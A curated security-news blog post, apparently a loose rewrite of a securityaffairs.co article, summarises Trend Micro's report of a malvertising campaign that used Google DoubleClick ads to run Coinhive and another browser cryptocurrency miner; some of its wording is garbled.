google-site-verification: google30a059f9a075f398.html

Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner

CyberWisdom Safe Harbor Commentary on Coinhive miners

I couldn’t believe this story from securityaffairs.co that tells an interesting

Trend Micro has seen a surge in the number of Cryptocurrency miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads on YouTube and other websites.
Due to the rapid rise of monetary value such as Bitcoin and Ethereum, the number of cyber attacks on cryptocurrencies has increased.

Hackers are targeting almost any unit that participates in cryptocurrency operations, a single user, miners, and of course, exchanges.

Security companies have discovered several malware applications specifically designed to steal cryptocurrencies, and many websites have been stolen to install scripts to mine virtual coins, misusing unidentified visitors’ computing resources.

Researchers at Trend Micro have seen a surge in the number of Coinhie miners in the past few days, apparently related to Google’s DoubleClick ads on YouTube and other websites.

“On January 24, 2018, we found that the number of detected Coinhive miners tripled due to malicious advertising campaigns, and we found that ads found on high-traffic sites use not only Coinhive (Trend Micro as JS_COINHIVE.GN) But also uses a separate web-mining tool to connect to the private pool, “said Trend Micro’s analysis report.

“We found Coinhive miners up nearly 285% on January 24. We saw traffic increase to five malicious domains on January 18. After scrutinizing network traffic, we found that traffic came from DoubleClick ads.”

Coinhive

The researchers observed two separate web-miner-monetized miner scripts, all hosted on AWS, that were invoked on the web page displaying DoubleClick ads.

The ad uses a JavaScript code that produces a random number between 1 and 101. If the number is greater than 10, the ad calls the coinhive.min.js script to mine 80% of the CPU power. The remaining 10% advertised a private web miner, mqoj_1.js script.

“Both webmasters configured a throttle of 0.2, which means miners will use 80% of CPU resources for mining.” Continue analysis.

Coinhive

Google immediately violates the policy on ads that abuse user resources.

Preventing JavaScript-based applications from running in a browser may prevent Coinhive Miners from executing, and experts recommend periodically patching and updating Web browsers to reduce risk.

Read me…

Trend Micro uncovered a spike in the number of Coinhie miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites. The number of cyber-attacks against cryptocurrencies is increased due to a rapid increase in the value of currencies such as Bitcoin and Ethereum…. Engaging post, Read More…

thumbnail courtesy of securityaffairs.co.


If you like to receive more of these curated safe harbor news alerts then subscribe to my mailing list. and come back soon at https://www.safeharboroncyber.com/Blog/ to read further CyberWisdom Safe Harbor Commentaries. Home » Curated SafeHarboronCyber’s CyberWisdom Post » Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner